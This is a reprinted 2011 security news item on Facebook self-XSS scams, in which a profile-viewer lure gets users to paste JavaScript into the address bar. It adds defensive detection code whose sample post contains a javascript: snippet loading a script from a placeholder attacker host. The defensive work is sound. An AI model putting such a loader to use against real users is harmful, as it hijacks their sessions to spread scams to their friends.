Facebook scammers know that in order to keep users falling for their scams, they have to use a variety of approaches.
For example, there was a time when rogue applications were the scammers’ preferred method of making sure the scheme propagated through the social network. Before that, they were more partial to trying to get users to copy and paste scripts into their browser address bars to achieve the same result.
As users become accustomed to ignoring one particular approach – and Facebook is becoming more adept at spotting and blocking the rogue apps – the copy/paste script approach makes a comeback.
The most popular lure used by these scammers is the undying “See who viewed your profile” offer. The landing page can be a Facebook page or one hosted on another domain, and it asks the user to copy some JavaScript into the browser address bar and press Enter.

And just in case the user does not understand the instructions, the scammers have attached a video of the whole process. Once the directions have been followed, the user is (predictably) asked to fill out a survey in order to finally get the results. In the meantime, the JavaScript works its magic.
“Depending on the configurations of the attacker, the script will post a new bait message to the user’s wall, send chat messages to friends, tag you in post messages or images, or even create an event and send an invitation to all your friends,” explains Symantec.
“Of course, as always, the attack is easily configurable through a toolkit. Since the script runs in the context of Facebook and uses your open session, it can do a lot with your profile; it can do nearly everything you could do yourself.”
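The lure described above has a recognisable shape: a "see who viewed your profile" hook, an instruction to paste a `javascript:` snippet into the address bar, and a snippet that usually pulls further code from an external host. The following is an added example, not code from the article or from Symantec, of simple detection heuristics that flag such text; the sample post and the domains `scam-loader.example` and `x.example` are constructed placeholders.

```javascript
// Added example, not from the article: heuristics that flag a post or page
// telling users to paste a "javascript:" snippet into the address bar.
const LURE_PHRASES = [
  { label: 'profile-viewer lure', re: /who (has )?viewed your profile/i },
  { label: 'paste-into-address-bar instruction',
    re: /(paste|copy) (this|the) (code|script) (in|into) (your )?(browser('s)? )?address bar/i },
  { label: 'press-enter instruction', re: /press enter/i },
];

// Undo the two most common obfuscations in pasted snippets:
// percent-encoding and String.fromCharCode(...) number lists.
function deobfuscate(src) {
  let out = src;
  try { out = decodeURIComponent(out); } catch (e) { /* not percent-encoded; keep as-is */ }
  return out.replace(/String\.fromCharCode\(([\d,\s]+)\)/g, (_, nums) =>
    String.fromCharCode(...nums.split(',').map(n => parseInt(n, 10))));
}

// Hosts the snippet would pull further code from (e.g. s.src='http://...').
function externalHosts(js) {
  const hosts = new Set();
  for (const m of js.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Returns { selfXss, reasons, hosts } for a block of post or page text.
function analyze(text) {
  const reasons = [];
  const snippets = [...text.matchAll(/javascript:([^\r\n]+)/gi)].map(m => deobfuscate(m[1]));
  if (snippets.length) reasons.push('javascript: URI present');
  const lureHits = LURE_PHRASES.filter(p => p.re.test(text)).map(p => p.label);
  reasons.push(...lureHits);
  const hosts = [...new Set(snippets.flatMap(externalHosts))];
  if (hosts.length) reasons.push(`loads code from ${hosts.join(', ')}`);
  // A javascript: snippet alone is not proof; require a lure phrase or an external loader too.
  const selfXss = snippets.length > 0 && (lureHits.length > 0 || hosts.length > 0);
  return { selfXss, reasons, hosts };
}

// Constructed sample post; scam-loader.example is a placeholder domain.
const SAMPLE_POST = [
  'OMG see who viewed your profile!!!',
  'Copy this code into your browser address bar and press Enter:',
  "javascript:(function(){var s=document.createElement('script');" +
  "s.src='http://scam-loader.example/viewers.js';document.body.appendChild(s);})()",
  'Then fill in the survey to see your results',
].join('\n');
console.log(analyze(SAMPLE_POST));
```

The same check can run over harvested wall posts or reported landing pages; the `hosts` list is the value worth feeding into blocklists, since the loader domain is what the toolkit operators swap between campaigns.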
Posted on 08 May 2011.
The above information is reprinted from and copyrighted © by Help Net Security.